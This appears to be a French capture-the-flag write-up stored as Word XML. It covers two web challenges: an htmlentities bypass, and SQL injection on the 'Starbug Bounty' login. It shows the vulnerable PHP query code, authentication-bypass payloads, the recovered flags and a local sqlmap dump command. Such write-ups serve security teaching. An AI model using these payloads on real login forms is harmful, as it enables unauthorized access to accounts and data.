              <w:t>$result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echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"You</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>can</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>valid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>&lt;b&gt;"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"&lt;/b&gt;"</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echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"&lt;b&gt;Wrong</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>login/password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>!&lt;/b&gt;"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body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">Htmlentities($var, ENT_QUOTES) </w:t>
      </w:r>
      <w:r>
        <w:t>qui échape les quotes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>‘) et les guillemets (“).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Si pour le login on soumet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘or 1=1 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">le login après avoir été passé dans htmlentities aura la valeur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>’or 1=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>et notre injection ne fonctionnera pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L’idée ici c’est de profiter que l’on peut manipuler les variables $login ET $pass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On va alors échapper la guillemet de fermeture de $login: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">La requête SQL devient alors: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>SELECT * FROM chall1_users WHERE login = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>toto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>En vert la partie qui sera interprétée comme le login et en rouge notre champ d’exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Cependant la variable $login est aussi passée dans la fonction stripslashes() qui a pour effet d’échapper les back slashes. Il nous suffit d’injecter comme ceci: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ce qui nous donnera:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>SELECT * FROM chall1_users WHERE login = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>\\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>toto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L’injection finale pour se connecter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>login=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;password= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>or 1=1 limit 1 -- a-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="65000"/>
                <w14:lumOff w14:val="35000"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ese{Htmlentities_bypass}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>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0" w:name="_Toc259757843"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 100 - Starbug Bounty</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>On détecte une simple injection SQL, il est donc possible de contourner l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’authentification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> avec le payload suivant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Username : ‘ or 1&lt;2 --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Password : peu importe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>En injectant le payload dans le champ “username” de la requête 1 la condition devient vraie et le reste de la requête est ignorée car elle est précédée d’un commentaire.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80"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$stmt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$pdo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</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users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>username='"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'username'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>password='"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</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rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$stmt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$pdo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</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users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>username=''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>1&lt;2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>--'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>password='"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>].</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"'"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous sommes connectés sur l’interface et nous pouvons donc utiliser le flag qui nous est donné : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{Auth_SqL_1s_s0000_w34k}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1619885" cy="2110740"/>
            <wp:effectExtent l="0" t="0" r="889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15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="4570730" y="3713480"/>
                      <a:ext cx="1619885" cy="2110740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Interface d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’authentification d</w:t>
      </w:r>
      <w:r>
        <w:t>u challenge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Il était aussi possible d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’utiliser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLMap pour extraire le contenu de la base de donnée et ensuite se connecter avec les identifiants récupérés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>python sqlmap.py -u '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.0.0.1/ESE-Epreuves/ESE%20Web%2002%20-%20Starbug%20Bounty%20-%20Max/Epreuve/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' --forms --dbms sqlite --dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Parameter: username (POST)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Type: UNION query</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Title: Generic UNION query (NULL) - 3 columns</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Payload: username=LuTQ' UNION ALL SELECT NULL,NULL,'qkkxq'||'OiFwUyQzDLyHkaXXNhYMGyCFRZKumpaQtpzciaIA'||'qpkpq'-- -&amp;password=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
